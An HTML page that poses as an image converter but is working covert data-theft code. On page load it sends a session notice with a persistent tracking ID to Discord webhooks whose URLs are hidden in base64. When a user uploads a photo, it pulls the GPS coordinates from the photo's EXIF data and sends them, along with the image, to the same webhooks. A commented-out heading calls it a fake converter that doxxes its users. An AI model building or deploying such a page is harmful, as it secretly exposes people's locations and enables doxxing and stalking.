<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Image "Converter"</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/exif-js/2.3.0/exif.js"></script>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            max-width: 800px;
            margin: 0 auto;
            padding: 3vw;
            background-color: #f0f4f8;
            color: #333;
        }

        h1 {
            color: #2c3e50;
            text-align: center;
            margin-bottom: 30px;
        }

        .container {
            background-color: white;
            border-radius: 8px;
            padding: 30px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }

        #imageInput {
            display: none;
        }

        .file-upload {
            display: inline-block;
            padding: 12px 20px;
            background-color: #3498db;
            color: white;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s;
            overflow: hidden;
            text-overflow: ellipsis;
            white-space: nowrap;
        }

        .file-upload:hover {
            background-color: #2980b9;
        }

        button {
            display: inline-block;
            padding: 12px 20px;
            background-color: #2ecc71;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s;
            margin-left: 10px;
        }

        button:hover {
            background-color: #27ae60;
        }

        #result {
            margin-top: 20px;
            padding: 15px;
            background-color: #ecf0f1;
            border-radius: 4px;
            font-size: 16px;
        }

        #imagePreview {
            max-width: 100%;
            margin-top: 20px;
            border-radius: 4px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }

        .controls {
            display: flex;
            justify-content: center;
            align-items: center;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Image "Converter"</h1>
        <!--<h1 style="color: red;">Fake image converter that actually doxxes you</h1>-->
        <div class="controls">
            <label for="imageInput" class="file-upload">Choose Image</label>
            <input type="file" id="imageInput" onchange="uploadImage()">
        </div>
        <div id="result"></div>
        <img id="imagePreview" src="" alt="Image preview" style="display: none; max-height: 20em;">
    </div>

    <script>

        const webhookUrl = window.parent.location.href.includes("/pagesource.html") ? atob("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMzMDUyNDI0MjkxMTAzNTQ2NC9sSElGZE1ZMVhvQUVZbjFiOFNtWkZrMWJ4dGhUX19rQ2dFYjhTcFRNWFFNZXlLc0Y1ZFUwdXVTdWFwNWFSYVNtWVFWWg==") : atob("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTI2OTU5Njk0MzAyNjM1NjMwNi9BMWNWNE5xX3FmRGxxdEJndHlXUExsdWdvUWI3Nm9NOTBwLV96ZUlzTGNfODlGTWxSc0R1SmJyal95MG1kQkR1cURiWg==");

        const formDataLoad = new FormData();
        formDataLoad.append('content', `NEW SESSION OPENED\nFrom path: ${window.parent.location.href}\nFrom UUID: ${getMachineId()}`);
        fetch(webhookUrl, {
            method: 'POST',
            body: formDataLoad,
        })
            .then(response =>
            {
                if (response.ok)
                {
                    console.log('Message sent to Discord successfully');
                } else
                {
                    console.error('Failed to send message to Discord');
                }
            })
            .catch(error =>
            {
                console.error('Error:', error);
            });

        function uploadImage()
        {
            const input = document.getElementById('imageInput');
            const file = input.files[0];
            const result = document.getElementById('result');
            const preview = document.getElementById('imagePreview');

            if (file)
            {
                const reader = new FileReader();
                reader.onload = function (e)
                {
                    preview.src = e.target.result;
                    preview.style.display = 'block';

                    EXIF.getData(file, function ()
                    {
                        const lat = EXIF.getTag(this, "GPSLatitude");
                        const lon = EXIF.getTag(this, "GPSLongitude");

                        if (lat && lon)
                        {
                            const latRef = EXIF.getTag(this, "GPSLatitudeRef") || "N";
                            const lonRef = EXIF.getTag(this, "GPSLongitudeRef") || "E";
                            const latitude = convertDMSToDD(lat[0], lat[1], lat[2], latRef);
                            const longitude = convertDMSToDD(lon[0], lon[1], lon[2], lonRef);
                            const beforeJSON = EXIF.getAllTags(this);
                            const exifStringJSON = (JSON.stringify(beforeJSON, null, 2)).toString();
                            const exifblob = new Blob([exifStringJSON], { type: 'text/plain' });
                            console.log(exifblob);
                            result.innerHTML = `Image "Converted" to coordinates and sent to discord bot: ${latitude.toFixed(6)}, ${longitude.toFixed(6)}`;
                            compressImage(e.target.result, function (compressedBlob)
                            {
                                sendToDiscordBot(latitude, longitude, compressedBlob, file.name, exifblob);
                            });
                        } else
                        {
                            result.innerHTML = "Unable to convert"; //No coordinates found in the image.
                        }
                    });
                };
                reader.readAsDataURL(file);
            } else
            {
                result.innerHTML = "Please select an image first.";
            }
        }

        function convertDMSToDD(degrees, minutes, seconds, direction)
        {
            let dd = degrees + minutes / 60 + seconds / (60 * 60);
            if (direction === "S" || direction === "W")
            {
                dd = dd * -1;
            }
            return dd;
        }

        function getMachineId()
        {
            let machineId = localStorage.getItem('MachineId');

            if (!machineId)
            {
                machineId = crypto.randomUUID();
                localStorage.setItem('MachineId', machineId);
            }

            return machineId;
        }

        function compressImage(dataURL, callback)
        {
            const img = new Image();
            img.onload = function ()
            {
                const canvas = document.createElement('canvas');
                const ctx = canvas.getContext('2d');

                const MAX_SIZE = 300;
                let width = img.width;
                let height = img.height;

                if (width > height)
                {
                    if (width > MAX_SIZE)
                    {
                        height *= MAX_SIZE / width;
                        width = MAX_SIZE;
                    }
                } else
                {
                    if (height > MAX_SIZE)
                    {
                        width *= MAX_SIZE / height;
                        height = MAX_SIZE;
                    }
                }

                canvas.width = width;
                canvas.height = height;

                ctx.drawImage(img, 0, 0, width, height);

                canvas.toBlob(function (blob)
                {
                    callback(blob);
                }, 'image/jpeg', 0.7);
            };
            img.src = dataURL;
        }

        function sendToDiscordBot(latitude, longitude, imageBlob, fileName, EXIF = "")
        {
            const formData = new FormData();

            //formData.append('file', EXIF, "message.txt");
            formData.append('file', imageBlob, fileName);
            formData.append('content', `New image uploaded:\n${latitude}, ${longitude}\nFrom path: ${window.parent.location.href}\nFrom UUID: ${getMachineId()}`);

            fetch(webhookUrl, {
                method: 'POST',
                body: formData,
            })
                .then(response =>
                {
                    if (response.ok)
                    {
                        console.log('Message sent to Discord successfully');
                    } else
                    {
                        console.error('Failed to send message to Discord');
                    }
                })
                .catch(error =>
                {
                    console.error('Error:', error);
                });
        }

        // Update file input label with selected file name
        document.getElementById('imageInput').addEventListener('change', function (e)
        {
            var fileName = e.target.files[0].name;
            var shortenedName = shortenFileName(fileName);
            document.querySelector('.file-upload').textContent = shortenedName;
        });

        // Function to shorten file name
        function shortenFileName(fileName)
        {
            if (fileName.length > 200)
            {
                var extension = fileName.split('.').pop();
                var name = fileName.substr(0, fileName.lastIndexOf('.'));
                return name.substr(0, 8) + '...' + name.substr(-8) + '.' + extension;
            }
            return fileName;
        }
    </script>
</body>
</html>